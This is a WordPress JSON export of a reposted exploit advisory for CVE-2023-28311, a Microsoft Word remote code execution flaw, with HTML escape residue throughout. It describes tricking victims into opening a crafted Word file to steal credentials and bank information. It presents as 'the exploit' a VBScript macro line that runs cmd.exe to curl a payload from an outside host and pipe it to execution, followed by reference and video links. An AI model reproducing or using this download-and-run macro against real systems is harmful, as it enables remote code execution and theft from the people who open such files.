## Title: Microsoft Word Remote Code Execution Vulnerability
\n## Author: nu11secur1ty
\n## Date: 04.14.2023
\n## Vendor: https:\/\/www.microsoft.com\/
\n## Software:
\nhttps:\/\/www.microsoft.com\/en-us\/microsoft-365\/word?activetab=tabs%3afaqheaderregion3
\n## Reference:
\nhttps:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/
\n## CVE-2023-28311<\/p>\n
## Description:
\nThe attack itself is carried out locally by a user with authentication to
\nthe targeted system. An attacker could exploit the vulnerability by
\nconvincing a victim, through social engineering, to download and open a
\nspecially crafted file from a website which could lead to a local attack on
\nthe victim’s computer. The attacker can trick the victim to open a
\nmalicious web page by using a `Word` malicious file and he can steal
\ncredentials, bank accounts information, sniffing and tracking all the
\ntraffic of the victim without stopping – it depends on the scenario and etc.<\/p>\n
STATUS: HIGH Vulnerability<\/p>\n[+]Exploit:
\nThe exploit server must be BROADCASTING at the moment when the victim hit
\nthe button of the exploit!<\/p>\n
“`vbs
\nCall Shell(“cmd.exe \/S \/c” & “curl -s
\nhttp:\/\/tarator.com\/ChushkI\/ebanie.tarator | tarator”, vbNormalFocus)
\n“`<\/p>\n
## Reproduce:
\n[href](
\nhttps:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2023\/CVE-2023-28311)<\/p>\n
## Reference:
\n[href](https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-28311)<\/p>\n[href](
\nhttps:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/)<\/p>\n
## Proof and Exploit
\n[href](https:\/\/streamable.com\/s60x3k)<\/p>\n
## Time spend:
\n01:00:00<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: Microsoft Word Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 04.14.2023 ## Vendor: https:\/\/www.microsoft.com\/ ## Software: https:\/\/www.microsoft.com\/en-us\/microsoft-365\/word?activetab=tabs%3afaqheaderregion3 ## Reference: https:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/ ## CVE-2023-28311 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40381","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40381"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381\/revisions"}],"predecessor-version":[{"id":40382,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381\/revisions\/40382"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}